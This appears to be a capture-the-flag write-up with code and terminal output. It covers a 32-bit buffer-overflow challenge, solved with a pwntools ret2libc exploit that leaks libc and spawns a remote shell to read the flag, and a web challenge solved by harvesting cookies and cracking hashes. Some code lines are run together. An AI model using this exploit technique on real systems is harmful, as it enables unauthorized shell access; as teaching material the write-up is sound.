Thanks for attending BSides, have a nice day!
$ ./chall
It's been fun, but here we are at the final challenge!
May I know your name?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
It's been nice meeting you, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Segmentation faultfrom pwn import *
elf = context.binary = ELF('./chall')
if args.REMOTE:
p = remote('13.233.104.112', 2222)
libc = ELF('./libc-remote.so')
else:
p = process()
libc = elf.libcpayload = flat(
'A' * 40,
0x080490a0, # puts@PLT
elf.sym['main'],
elf.got['puts']
)
p.recvuntil('name?\n')
p.sendline(payload)p.recvline()
puts_leak = u32(p.recv(4))
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']
log.success(f'libc: {hex(libc.address)}')
p.clean()payload = flat(
'A' * 40,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()from pwn import *
elf = context.binary = ELF('./chall')
if args.REMOTE:
p = remote('13.233.104.112', 2222)
libc = ELF('./libc-remote.so')
else:
p = process()
libc = elf.libc
# context.log_level = 'debug'
payload = flat(
'A' * 40,
0x080490a0, # puts@PLT
elf.sym['main'],
elf.got['puts']
)
p.recvuntil('name?\n')
p.sendline(payload)
p.recvline()
puts_leak = u32(p.recv(4))
log.success(f'Puts@libc: {hex(puts_leak)}')
libc.address = puts_leak - libc.sym['puts']
log.success(f'libc: {hex(libc.address)}')
p.clean()
payload = flat(
'A' * 40,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()$ python3 exploit.py REMOTE
[+] Puts@libc: 0xf7dad3d0
[+] libc: 0xf7d46000
[*] Switching to interactive mode
It's been nice meeting you, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]
$ ls
chall
flag
run.sh
$ cat flag
BSDCTF{3xpl0r1ng_th3_unkn0wn}User-agent: *
Disallow: /cookie.php"Our_Fav_Cookie=8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643; Piece=6"from requests import Session
sess = Session()
while True:
r = sess.get('http://15.206.202.26/cookie.php')
cookies = r.cookies.get_dict()
print(cookies)c4694f2e93d5c4e7d51f9c5deb75e6cc8be5e1114178c6a45b6fc2c566a0aa8c : O
f67ab10ad4e4c53121b6a5fe4da9c10ddee905b978d3788d2723d7bfacbe28a9 : F
4ae81572f06e1b88fd5ced7a1a000945432e83e1551e6f721ee9c00b8cc33260 : Q
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
333e0a1e27815d0ceee55c473fe3dc93d56c63e3bee2b3b4aee8eed6d70191a3 : G
8de0b3c47f112c59745f717a626932264c422a7563954872e237b223af4ad643 : S
021fb596db81e6d02bf3d2586ee3981fe519f275c0ac9ca76bbcf2ebb4097d96 : {
5c62e091b8c0565f1bafad0dad5934276143ae2ccef7a5381e8ada5b1a8d26d2 : P
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 : 0
[...]cat cracked | awk -F ' : ' '{print $2}' > flag
for line in $(cat flag); do echo -n $line; doneOFQPGS{P00x135_ne3_o35g_cy4p3_70_pu3px}